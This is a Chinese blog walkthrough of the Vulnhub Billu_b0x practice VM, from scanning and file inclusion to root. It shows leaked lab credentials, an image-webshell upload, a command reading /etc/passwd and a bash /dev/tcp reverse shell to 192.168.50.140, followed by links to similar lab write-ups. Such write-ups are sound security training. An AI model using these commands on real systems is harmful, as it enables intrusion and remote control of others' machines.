Vulnhub靶场第二关

最新推荐文章于 2026-05-20 16:32:57 发布
原创 最新推荐文章于 2026-05-20 16:32:57 发布 · 457 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#安全
本文详细记录了在Vulnhub靶场Billu_b0x环境中,从Web应用渗透到获取root权限的全过程。通过nmap扫描、目录爆破、文件包含漏洞利用、数据库账号获取、图片马上传与执行,最终实现提权。

Vulnhub靶场 Billu_b0x
目标:
Boot to root:从Web应用程序进入虚拟机,并获得root权限.
运行环境:
靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。
攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、
AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。
1.使用nmap 扫描子网查找可用ip
在这里插入图片描述
2.访问这个ip
在这里插入图片描述
3.发现登录页面但是访问源码没有发现可用漏洞准备爆破目录
在这里插入图片描述
4.可以看到扫描到很多目录,依次访问,访问到test目录时发现问题,需要提供file参数,立刻想到文件包含漏洞
在这里插入图片描述
5.测试文件包含失败,转跳到了192.168.238.129
在这里插入图片描述
6.改变思路,利用burp抓包将get请求变为post请求再次尝试文件包含
在这里插入图片描述
7.包含成功,利用同样的方式查看其他目录
在这里插入图片描述
8.发现数据库账号密码成功登录
账号:billu
密码:b0x_billu
在这里插入图片描述
9.phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下,猜测成功并且发现账户:root密码:roottoor
在这里插入图片描述
10.从数据库中获得首页登录账号:biLLu密码:hEx_it
在这里插入图片描述
11.返回首页登录
在这里插入图片描述
12.登陆成功
在这里插入图片描述
13.制作图片马并且上传
Cmd制作马命令:copy 12.jpg/b+1.php/a 12.jpg
上传成功后执行:
POST /panel.php?cmd=cat%20/etc/passwd;ls
load=/uploaded_images/12.jpg&continue=continue
在这里插入图片描述
14.
开始使用nc监听:
1.开启监听nc -lvnp 6666
2.同时利用burp的post请求执行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1” | bash
但是要进行url编码
3.执行python -c 'import pty;pty.spawn("/bin/bash")'命令得到交互shell
在这里插入图片描述
15.提权完成

TryHackMe - Jack-of-All-Trades靶场
z4yn:)的博客
02-23 389
Jack-of-All-Trades Boot-to-root originally designed for Securi-Tay 2020 0x00 信息收集 正常的用Nmap扫全端口。发现22和80端口对调了。。。感觉这个靶场肯定不太正经。 打开Web服务是22端口发现打不开,可以参照下面链接解决。 https://www.cnblogs.com/ryuuku/p/7467151.html 正常扫描一波目录,这里发现assets里面有3张图片。用wget下载下来先。...
国内7大Web渗透靶场实战指南:从新手破局到CVE复现
最新发布
weixin_34194964的博客
05-20 521
Web渗透测试是网络安全工程师的核心能力,其本质是理解HTTP协议、输入输出控制与服务端执行逻辑的交互过程。掌握SQL注入、XSS、CSRF、SSRF、反序列化等OWASP Top 10漏洞,需依托稳定低延迟的靶场环境进行闭环训练。国内靶场因免代理、纯Web访问、本地化运行等特性,显著降低网络调试门槛,让学习者聚焦漏洞原理而非环境故障;DVWA、WebGoat、Pikachu等主流靶场分别覆盖‘攻击验证—防御推演—业务建模’三层认知路径,支撑从手工测试到自动化利用(如SQLMap集成)、从单点漏洞到内网横向
php setconfig文件在哪,phpMyAdmin配置文件config.inc.php详解
weixin_39661881的博客
03-19 296
/*$Id:config.inc.php,v1.204.2.12003/10/1014:24:24nijelExp$*///vim:expandtabsw=4ts=4sts=4:/***phpMyAdminConfigurationFile**AlldirectivesareexplainedinDocumentation.html*//***Set...
Vulnhub手册》——02 Lampiao
weixin_53801131的博客
12-08 1859
Vulnhub手册——02 Lampiao 背景概述: 下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/ 本次的靶机ip为192.168.2.230 1. 信息收集 1.1 扫描目标主机IP 使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24,扫描结果如下。 └─$ sudo nmap -sP 192.168.2.0/24 Starting Nmap 7.91 ( https://nmap.org ) at 202
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 6173
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 6133
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
VulnHub靶场】——BEELZEBUB: 1
热门推荐
Demo不是emo的博客
09-25 1万+
​ 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 4108
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
Docker 搭建 Vulnhub 靶场环境
白帽渗透笔记的博客
08-11 1万+
Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤。 今天我们来讲一下如何使用 Docker 来启动 Vulnhub 上的靶场。 首先需要准备一台虚拟机,我用的是 CentOS7 的虚拟机,1 核 4 G 内存 60G 硬盘,为了靶场运行流畅一点,就多给了一点内存,直接给了 4 G。 首先需要安
vulnhub靶场【IA系列】之Tornado
China_I_LOVE的博客
01-13 1416
该靶机主要考察以下几点对于网站路径,以及本地文件包含的注入点测试对于linux中表示什么意思,以及~用户表示什么意思,以及/home是存放什么的对于sql截断注入的了解,要测试后,才能知道,这里就是观察到注册成功,但是无法成功登录的情况进行具体分析对于输入框,输入什么返回什么,若是未登录状态,使用xss可行,当然,实际情况中,若是真有,可以构造链接,发送给别人。这里是要获取shell,所以测试命令注入方面。虽然没有回显,但是在执行需要时间的命令时,明显发现是可执行命令的对于sudo。
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 4138
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub 靶场】【CEREAL: 1】【困难】【20210529】
惟忆
11-29 4415
靶场介绍:https://www.vulnhub.com/entry/cereal-1,703/ 靶场下载:https://download.vulnhub.com/cereal/Cereal.ova 靶场难度:困难 发布日期:2021年5月29日 文件大小:1.1 GB 靶场作者:Thomas Williams 靶场描述:打靶耗时:12+小时,可以说每一步都很困难。。。另一方面也可以说很真实。。。而且网上教程有的部分都过时了,命令根本用不了,在此更新内容。 打靶键: Nmap 执行结果中,端口状态后经
VulnHub靶场LupinOne
I夜白
02-01 5285
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
VulnHub靶场】——MONEYBOX: 1
Demo不是emo的博客
09-28 4056
​ 今天的博客内容MONEYBOX: 1教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索MONEYBOX: 1就能下载今天的靶场了,也可以找我拿,话不多说进入今天的靶场学习 ​
vulnhub靶场【DC系列】之7
China_I_LOVE的博客
01-08 1383
对于信息收集时,源码泄露能否会寻找,这里是通过一个作者名搜索到gihub的项目对于提权时,发现的东西都要去试一试,这里先测试exim4不行后,再下手脚本文件对于脚本文件的所属者和所属组要搞清楚,这里dc7user不属于www-data组,所以还需要获取www-data用户的反弹shell,那么就需要从网站下手对于drush和drupal是配合使用的,所以简单了解drush的增删改查即可drupal 8下载扩展模块,可以自己选择,不过出于安全,版本8没有php,所以可以安装php通过php。
Vulnhub-Narak靶场
Longwaer
12-29 1283
Vulnhub中Narak靶场学习,通过笔记全方位细致演示,更快的掌握漏洞复现、各种小技巧等。
Kali Linux 安装配置 vulnhub 靶场保姆级教程
vortex5的博客
06-01 2583
本文介绍了Kali Linux的基本配置与Vulnhub靶场部署方法。主要内容包括:更换国内软件源以提升下载速度、设置中文环境(安装字体和输入法)、安装配置Docker及Compose工具,并详细说明了Vulnhub靶场的下载、部署和访问步骤。文章还提供了常见问题解决方案,如源更新失败、中文乱码、镜像拉取问题等。通过本指南,用户可以快速搭建一个支持中文的Kali Linux渗透测试环境,并运行Vulnhub漏洞靶场进行安全研究。
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 4907
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
vulnhub靶场之hackableIII
qq_58091216的博客
10-08 1630
我们查看根目录,可以看到有/home/目录,目录下有一个新的用户,我们进行查看,可以看到密码,我们进行登录。随便输入用户名和密码,发现进去是空白的,我们查看源代码,可以看到一个3.jpg。我们可以看到就一个页面,我们查看源代码,可以发现一串英文,和一个登录页面。我们没有输入端口敲门命令之前,22端口是闭的,现在可以看到是开放的。我们查看id,我们看到lxd,那么这里可能就是使用lxd进行提权。我们可以看到扫描的目录都是一样的,我们一个一个进行访问。我们发现是一串base64编码,我们进行解密是一个端口。
vulnhub靶场实战系列-DC-2实战
专注Python编程与网络安全领域,分享原创技术文章与靶机渗透实战经验。以清晰的逻辑解构复杂技术,用深入浅出的笔触呈现:从Python基础到高级特性,从漏洞原理到攻防实践。在这里,代码与安全交织,思考与成长同行。
05-18 1762
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行,本文使用VMware测试,每个镜像会有破解的目标,挑战的目标是获取操作系统的root权限和获得flag。WordPress CMS的信息搜集与利用,获得flag,根据提示进一步操作使用cewl获得目标上存在的用户信息,获得密码字典使用wpscan进行WordPress网站用户名爆破,生成用户字典使用wpscan进一步爆破获得可用的密码和用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值